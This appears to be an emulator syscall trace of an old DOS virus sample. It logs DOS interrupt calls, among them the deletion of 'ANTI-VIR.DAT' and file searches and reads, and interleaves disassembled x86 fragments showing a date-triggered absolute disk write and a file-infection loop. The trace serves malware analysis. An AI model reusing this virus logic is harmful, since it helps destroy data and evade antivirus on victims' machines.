2018-12-25T12:36:11.520824314Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.522267609Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.523891017Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.525471214Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.526909355Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.528370785Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.530276069Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.531750727Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.533184173Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.535461144Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.537329558Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.539142945Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.541954365Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.543802331Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.545647027Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.548373937Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.550038193Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.55162443Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.553822565Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.555519006Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.557197239Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.559310002Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.561373404Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.563421282Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.566326132Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.567983515Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.56984671Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.571950486Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.574097127Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.575699346Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.577686358Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.579650146Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.581602187Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.583807229Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.585144452Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.586774829Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.588941735Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.592454977Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.59390398Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.59594914Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.597427003Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.598892347Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.600863053Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.602820963Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.604761687Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.61640415Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.617987402Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.619554421Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.622235861Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.623778265Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.625442894Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.627687747Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.629419891Z 250 PC: 12bb5 | UNKNOWN!
2018-12-25T12:36:11.630721189Z 67 PC: 12bee | Get or set file attributes
2018-12-25T12:36:11.638122728Z 65 PC: 12bf2 | Delete file (Filename = 'ANTI-VIR.DAT')
2018-12-25T12:36:11.644822214Z 44 PC: 12c0e | Get time 0x12c0e: mov word ptr ds:[bp + 0x13c], dx
0x12c13: jmp 0x12c31
0x12c15: mov ah, 0x3b
0x12c17: lea dx, word ptr [bp + 0x394]
0x12c1b: int 0x21
0x12c1d: mov al, byte ptr ds:[bp + 0x397]
0x12c22: cmp byte ptr ds:[bp + 0x397], 3
0x12c28: je 0x12c88
0x12c2a: inc al
0x12c2c: mov byte ptr ds:[bp + 0x397], al
0x12c31: mov ax, 0x4e00
0x12c34: mov cx, 0
0x12c37: lea dx, word ptr [bp + 0x253]
0x12c3b: int 0x21
0x12c3d: jae 0x12c42
0x12c3f: jmp 0x12d45
0x12c42: push 0x4300
0x12c45: pop ax
0x12c46: mov dx, 0x9e
0x12c49: int 0x21
2018-12-25T12:36:11.647268841Z 78 PC: 12c3d | Find first file
2018-12-25T12:36:11.654659472Z 67 PC: 12c4b | Get or set file attributes
2018-12-25T12:36:11.656965083Z 67 PC: 12c58 | Get or set file attributes
2018-12-25T12:36:11.658608882Z 61 PC: 12c60 | Open file (Filename = '')
2018-12-25T12:36:11.661056372Z 63 PC: 12c6f | Read file or device (Read 4 bytes on handle 2)

{"DateBased":true,"Day":18,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12736,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:36:11.785174249Z 42 PC: 12b63 | Get date 0x12b63: cmp dl, 0x12
0x12b66: jne 0x12b6c
0x12b68: mov al, 2
0x12b6a: int 0x26
0x12b6c: popaw
0x12b6d: mov ah, 0x47
0x12b6f: mov dl, 0
0x12b71: lea si, word ptr [bp + 0x344]
0x12b75: int 0x21
0x12b77: call 0x12b7e
0x12b7a: jmp 0x12bab
0x12b7c: add byte ptr [bx + si], al
0x12b7e: pushaw
0x12b7f: mov dx, word ptr ds:[bp + 0x13c]
0x12b84: jmp 0x12b8b
0x12b86: nop
0x12b87: mov ah, 0x4c
0x12b89: int 0x21
0x12b8b: mov cx, 0xae
0x12b8e: lea si, word ptr [bp + 0x16b]
2018-12-25T12:36:11.788397439Z 71 PC: 12b77 | Get current directory
2018-12-25T12:36:11.792900556Z 68 PC: 12ba6 | I/O control for devices (Set for = '���< t���2��æu��|�')
2018-12-25T12:36:11.794539977Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.796110921Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.797806305Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.812644094Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.814082292Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.815361932Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.816897554Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.818282018Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.819669882Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.82167593Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.823066621Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.824450447Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.826774581Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.828909886Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.831003459Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.83365234Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.835351744Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.837004671Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.839195474Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.840901637Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.842771296Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.844945461Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.847142194Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.849087106Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.851254699Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.853283286Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.854865353Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.856432115Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.859204495Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.860777634Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.862322473Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.864401964Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.866546964Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.868073614Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.884269051Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.885821847Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.88718601Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.889281377Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.890861224Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.892425612Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.894387285Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.895894105Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.897383933Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.899156011Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.901710252Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.903971177Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.906734541Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.908887175Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.9110127Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.913371669Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.9156107Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.91712396Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.918622406Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.921048167Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.92263006Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.924178867Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.92639712Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.928110855Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.929773562Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.933269434Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.935132429Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.936900999Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.939713684Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.941240612Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.942739696Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.944677467Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.946168564Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.947495936Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.948982612Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.950553916Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.952105224Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.953745232Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.955660178Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.957276502Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.958765442Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.961319025Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.962746961Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.964952675Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.967258434Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.969245774Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.971201823Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.973694175Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.975568136Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.97740801Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.980003103Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.981917391Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.983776759Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.985908469Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.987526629Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.989112796Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.99184442Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.993674151Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.995778562Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.997712677Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:11.999634236Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.001265474Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.003059222Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.004797973Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.006280858Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.007999864Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.010222681Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.01215171Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.01431762Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.017331884Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.019431802Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.021562971Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.024251621Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.026023751Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.027570577Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.030119094Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.032045096Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.033952673Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.03619527Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.037929521Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.039874062Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.042899387Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.044935538Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.046951305Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.049442891Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.051400648Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.053147388Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.055617381Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.057177709Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.059611816Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.061634011Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.06361042Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.065243864Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.067660016Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.069166259Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.070629143Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.072942081Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.074839794Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.076488009Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.078456602Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.080141109Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.081486097Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.083711185Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.085595813Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.087680671Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.089758085Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.091708405Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.093636746Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.096478719Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.098322348Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.100291231Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.102394746Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.104108506Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.105603118Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.10721642Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.108980083Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.110511455Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.112005467Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.113921574Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.115482754Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.117361521Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.11903642Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.120554733Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.122227746Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.12417855Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.126052685Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.128032034Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.130170582Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.131927523Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.14187788Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.144513787Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.145898524Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.148731203Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.150649287Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.152561539Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.154588027Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.156574976Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.158720329Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.160264089Z 68 PC: 12ba6 | I/O control for devices (See above)
2018-12-25T12:36:12.162479669Z 250 PC: 12bb5 | UNKNOWN!
2018-12-25T12:36:12.164148943Z 67 PC: 12bee | Get or set file attributes
2018-12-25T12:36:12.16873463Z 65 PC: 12bf2 | Delete file (Filename = '>�>�>�>�>�>�>�>�>�>�>�>�>�>�>�p��Q�[�N�[�M���>�>�>�>�>�>�>�>�>�>�>�>�>�>�>�>�>�>�>�>�>�>�>�>�>')
2018-12-25T12:36:12.173352984Z 44 PC: 12c0e | Get time 0x12c0e: mov word ptr ds:[bp + 0x13c], dx
0x12c13: jmp 0x12c31
0x12c15: mov ah, 0x3b
0x12c17: lea dx, word ptr [bp + 0x394]
0x12c1b: int 0x21
0x12c1d: mov al, byte ptr ds:[bp + 0x397]
0x12c22: cmp byte ptr ds:[bp + 0x397], 3
0x12c28: je 0x12c88
0x12c2a: inc al
0x12c2c: mov byte ptr ds:[bp + 0x397], al
0x12c31: mov ax, 0x4e00
0x12c34: mov cx, 0
0x12c37: lea dx, word ptr [bp + 0x253]
0x12c3b: int 0x21
0x12c3d: jae 0x12c42
0x12c3f: jmp 0x12d45
0x12c42: push 0x4300
0x12c45: pop ax
0x12c46: mov dx, 0x9e
0x12c49: int 0x21
2018-12-25T12:36:12.175747391Z 78 PC: 12c3d | Find first file